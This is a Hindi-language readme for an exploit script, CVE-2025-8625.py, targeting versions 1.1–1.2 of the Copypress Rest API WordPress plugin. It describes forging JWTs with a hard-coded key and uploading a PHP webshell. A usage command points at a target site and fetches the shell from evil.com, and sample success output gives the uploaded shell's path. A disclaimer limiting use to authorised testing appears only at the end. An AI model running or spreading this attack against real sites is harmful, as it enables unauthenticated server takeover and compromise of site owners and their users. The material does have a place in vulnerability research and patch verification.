
Copypress Rest API 1.1 - 1.2 - कॉन्फ़िगर करने योग्य JWT सीक्रेट और फ़ाइल-प्रकार सत्यापन की कमी से अप्रमाणित रिमोट कोड निष्पादन
Copypress Rest API 1.1 - 1.2 - कॉन्फ़िगर करने योग्य JWT सीक्रेट और फ़ाइल-प्रकार सत्यापन की कमी से बिना प्रमाणीकरण के रिमोट कोड निष्पादन
वर्डप्रेस के लिए Copypress Rest API प्लगइन (संस्करण 1.1 से 1.2) copyreap_handle_image() फ़ंक्शन के माध्यम से रिमोट कोड निष्पादन की भेद्यता से ग्रस्त है।
प्लगइन जब कोई सीक्रेट सेट नहीं होता है तो हार्ड-कोडेड JWT साइनिंग कुंजी का उपयोग करता है और फ़ाइल प्रकारों को मान्य नहीं करता है, जिससे बिना प्रमाणीकरण वाले हमलावर टोकन जाली बना सकते हैं और इमेज हैंडलर एंडपॉइंट के माध्यम से मनमानी फ़ाइलें (जैसे PHP शेल) अपलोड कर सकते हैं।
स्क्रिप्ट नाम: CVE-2025-8625.py
यह Python स्क्रिप्ट भेद्यता के शोषण को स्वचालित करती है, जिससे आप एक मान्य JWT उत्पन्न कर सकते हैं, एक क्राफ्टेड अनुरोध भेज सकते हैं, और भेद्य WordPress साइट पर एक दुर्भावनापूर्ण फ़ाइल (webshell) अपलोड कर सकते हैं।
python CVE-2025-8625.py -u https://target.com -shell https://evil.com/shell.php
-u / --url: लक्षित WordPress साइट URL-shell / --shell: आपके webshell या दुर्भावनापूर्ण PHP फ़ाइल का सीधा लिंकउदाहरण आउटपुट:
JWT: eyJ0eXAiOiJKV1QiLCJhbGciOi...
HTTP 201: {"created":true,"id":123,"message":"Success"}
Exploit success! Check your shell upload.
शेल सफलतापूर्वक अपलोड हो गया! 🎉
शेल पथ उदाहरण:
https://target.com/wp-content/uploads/2025/10/shell.php
यह टूल केवल शैक्षिक और अधिकृत पेनेट्रेशन परीक्षण उद्देश्यों के लिए है।
स्पष्ट अनुमति के बिना लक्ष्यों के विरुद्ध उपयोग अवैध है।
द्वारा: Nxploited (Khaled Alenazi)